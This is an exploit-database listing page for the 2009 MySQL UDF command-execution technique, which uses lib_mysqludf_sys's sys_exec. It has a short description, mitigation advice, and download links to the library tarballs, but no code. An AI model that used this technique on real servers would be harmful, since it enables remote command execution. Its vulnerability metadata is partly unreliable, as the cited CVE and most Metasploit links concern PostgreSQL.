header-logo
Suggest Exploit
vendor:
MySQL
by:
Bernardo Damele A. G.
9
CVSS
HIGH
MySQL UDF for command execution
78
CWE
Product Name: MySQL
Affected Version From: 5.0.x
Affected Version To: 5.1.x
Patch Exists: YES
Related CWE: CVE-2009-4136
CPE: o:mysql:mysql
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0429/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0427/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0428/https://www.rapid7.com/db/vulnerabilities/postgres-cve-2009-4136/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2009-4136/https://www.rapid7.com/db/vulnerabilities/suse-cve-2009-4136/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2009-4136/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2009

MySQL UDF for command execution

This exploit allows attackers to execute arbitrary commands on a vulnerable MySQL server. The exploit is based on a UDF (User Defined Function) library called lib_mysqludf_sys. This library contains a function called sys_exec, which allows attackers to execute arbitrary commands on the vulnerable server. The exploit was released in 2009 and affects MySQL versions 5.0.x and 5.1.x.

Mitigation:

The best way to mitigate this vulnerability is to upgrade to the latest version of MySQL. Additionally, users should ensure that the UDF library is not installed on the vulnerable server.
Source

Exploit-DB raw data:

MySQL UDF for command execution

[1] http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html
[2] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/mysqludfsys/lib_mysqludf_sys_0.0.3.tar.gz

mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/7856.tar.gz (2009-lib_mysqludf_sys_0.0.3.tar.gz)

# milw0rm.com [2009-01-25]

Navigation

Suggest Exploit

Services By CQR